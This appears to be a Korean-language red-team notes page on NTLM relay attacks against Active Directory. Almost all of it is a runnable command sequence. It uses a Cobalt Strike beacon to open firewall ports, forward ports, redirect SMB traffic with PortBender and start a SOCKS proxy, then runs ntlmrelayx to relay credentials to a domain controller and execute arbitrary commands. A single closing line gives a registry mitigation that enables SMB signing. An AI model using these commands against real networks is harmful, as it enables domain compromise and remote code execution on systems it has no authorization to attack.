NTLM Relay

대응 방안
References
Last updated

Last updated
# Relay 공격에 사용할 방화벽 규칙 생성
beacon> powershell New-NetFirewallRule -DisplayName "8445-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8445
beacon> powershell New-NetFirewallRule -DisplayName "8080-In" -Direction Inbound -Protocol TCP -Action Allow -LocalPort 8080
# 리모트 포트 포워딩 규칙 생성
beacon> rportfwd 8080 127.0.0.1 80
beacon> rportfwd 8445 127.0.0.1 445
# Cobalt Strike > Script Manager > PortBender.cna 로드 후 트래픽 리다이렉션 설정
beacon> PortBender redirect 445 8445
# 타겟 -> 비콘 -> 공격자로의 네트워크 연결을 위한 SOCKS 프록시 실행
beacon> socks 1080
# 공격자 머신에서 SMB 서버 실행
sudo proxychains ntlmrelayx.py -t smb://<Target DC> -smb2support --no-http-server --no-wcf-server -c '<Command>'# 디지털 서명 통신(항상)
reg add "HKLM\System\CurrentControlSet\Services\LanManServer\Parameters" /v SecuritySignature /t REG_DWORD /d 1 /f